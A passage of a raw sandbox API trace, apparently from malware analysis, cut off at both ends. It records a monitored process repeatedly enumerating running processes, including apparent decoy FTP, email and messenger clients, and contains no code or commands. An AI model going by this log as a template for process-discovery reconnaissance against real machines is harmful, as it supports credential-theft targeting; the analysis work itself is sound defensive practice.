lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0250.219] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0250.222] CloseHandle (hObject=0x233c) returned 1 [0250.222] Sleep (dwMilliseconds=0x64) [0250.328] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2330 [0250.343] Process32First (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.346] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0250.351] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0250.354] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.356] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0250.358] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.360] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0250.362] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0250.382] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0250.385] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.387] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.389] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0250.391] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.392] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.394] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.395] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.397] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.399] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.401] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.402] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0250.404] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0250.405] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.407] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0250.409] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.410] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0250.412] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0250.414] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0250.415] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0250.417] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0250.447] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0250.448] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.450] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0250.452] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0250.453] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0250.455] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.456] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0250.458] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0250.460] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0250.461] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0250.463] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0250.465] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0250.466] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0250.468] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0250.469] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0250.471] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0250.472] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0250.474] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0250.481] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0250.483] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0250.527] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0250.529] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0250.531] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0250.534] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0250.536] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0250.540] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0250.543] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0250.545] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0250.548] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0250.551] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0250.554] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0250.557] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0250.560] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0250.606] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0250.609] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0250.618] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0250.622] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0250.625] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0250.627] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0250.630] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0250.632] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0250.634] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0250.636] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0250.639] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0250.642] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0250.694] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0250.697] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0250.699] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0250.702] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0250.705] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0250.707] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0250.710] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0250.712] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0250.714] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, 